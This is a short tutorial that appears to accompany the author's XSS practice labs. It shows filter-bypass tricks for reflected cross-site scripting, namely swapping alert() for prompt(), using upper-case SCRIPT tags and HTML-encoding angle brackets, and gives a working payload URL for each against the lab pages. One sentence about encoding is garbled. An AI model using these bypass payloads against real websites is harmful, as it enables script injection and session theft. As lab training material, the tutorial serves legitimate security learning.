Alert

My friends, everyone and their grandmother knows about alert. Please stop using it from now on. Almost all of my labs filter it and so does almost anything in the wild.

For example, this will not work

https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dalert()>

Untitled

But this will

https://hackxpert.com/labs/RXSS/GET/11.php?fname=<img+src%3Dx+onerror%3Dprompt()>

Untitled

confirm

The same goes for filtering of confirm(), you can always use other ways of bypassing filters.

lowercase filtering

https://hackxpert.com/labs/RXSS/GET/10.php?fname=<script>alert()<%2Fscript>

Untitled

If we look at this example, lowercase “script” appears to be blocked. But what if we try “SCRIPT”?

https://hackxpert.com/labs/RXSS/GET/10.php?fname=<SCRIPT>alert()<%2FSCRIPT>

Filtering out special characters like <>()

This is hardly a challenge, we can try things like HTML encodings for example:

https://hackxpert.com/labs/RXSS/GET/15.php?fname=<script>alert()<%2Fscript>

We can replace the < with < in this case and still pop our XSS

https://hackxpert.com/labs/RXSS/GET/15.php?fname=%26lt%3Bscript>alert()%26lt%3B%2Fscript>